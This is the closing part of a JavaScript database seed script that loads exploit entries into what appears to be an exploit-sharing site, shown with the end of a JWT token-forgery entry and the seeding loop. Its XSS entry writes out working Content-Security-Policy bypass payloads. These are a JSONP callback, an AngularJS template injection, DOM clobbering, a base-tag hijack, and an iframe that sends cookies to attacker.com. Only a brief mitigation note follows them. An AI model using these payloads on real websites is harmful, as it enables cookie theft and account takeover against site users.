    authorAlias:'xcloak_seed',
    difficulty: 'intermediate',
    tags:       ['jwt','auth-bypass','algorithm-confusion','token-forgery','none'],
    dnaRisk:    8.2,
    dnaPayload: 'JWT Algorithm Confusion → Token Forgery',
    upvotes:    312,
    score:      8.5,
    verified:   true,
    views:      7400,
  },
  {
    title:       'XSS Filter Bypass — CSP Bypass via JSONP & Angular',
    slug:        'xss-csp-bypass-jsonp-angular',
    description: 'Advanced XSS bypasses for Content-Security-Policy. Uses JSONP endpoints on whitelisted domains, Angular template injection, and DOM-based sinks to execute JavaScript even with strict CSP in place.',
    code: [
      '<!-- XSS CSP Bypass Techniques -->',
      '',
      '<!-- Technique 1: JSONP bypass (whitelisted CDN has JSONP endpoint) -->',
      '<!-- If CSP allows: https://accounts.google.com -->',
      '<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(document.cookie)"></script>',
      '',
      '<!-- Technique 2: Angular template injection -->',
      '<!-- If page uses AngularJS from whitelisted CDN (e.g. ajax.googleapis.com) -->',
      '<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script>',
      '<div ng-app>{{constructor.constructor("alert(document.domain)")()}}</div>',
      '',
      '<!-- Technique 3: DOM clobbering -->',
      '<form id="config"><input name="url" value="javascript:alert(1)"></form>',
      '<script>document.getElementById("config").url.click()</script>',
      '',
      '<!-- Technique 4: Base tag hijack -->',
      '<!-- Inject before any relative script src: -->',
      '<base href="https://attacker.com/">',
      '<!-- Now <script src="/analytics.js"> loads from attacker.com -->',
      '',
      '<!-- Technique 5: iframe srcdoc (no script-src needed) -->',
      '<iframe srcdoc="<script>parent.document.location=\'https://attacker.com/?c=\'+parent.document.cookie</script>">',
      '</iframe>',
      '',
      '<!-- Mitigation:',
      "  - strict-dynamic in CSP replaces allowlisted URLs",
      "  - Use nonces/hashes instead of domain allowlists",
      "  - Avoid JSONP — use CORS instead",
      "  - Sanitize all reflected output with DOMPurify",
      '-->',
    ].join('\n'),
    language:   'javascript',
    type:       'XSS',
    os:         ['linux','windows','macos'],
    cveId:      null,
    authorAlias:'xcloak_seed',
    difficulty: 'advanced',
    tags:       ['xss','csp-bypass','jsonp','angular','dom-clobbering','iframe'],
    dnaRisk:    7.2,
    dnaPayload: 'CSP Bypass via JSONP / Angular Sandbox',
    upvotes:    267,
    score:      8.1,
    verified:   true,
    views:      4900,
  },
]

async function main() {
  console.log('Seeding exploits...')
  let created = 0
  for (const exploit of EXPLOITS) {
    try {
      await prisma.exploit.upsert({
        where:  { slug: exploit.slug },
        update: { views: exploit.views, upvotes: exploit.upvotes, score: exploit.score },
        create: exploit,
      })
      console.log('  OK:', exploit.title.substring(0, 55))
      created++
    } catch (e) {
      console.log('  SKIP:', e.message?.substring(0, 80))
    }
  }
  console.log(`\nSeeded ${created}/${EXPLOITS.length} exploits`)
  await prisma.$disconnect()
}

main().catch(e => { console.error(e); prisma.$disconnect(); process.exit(1) })
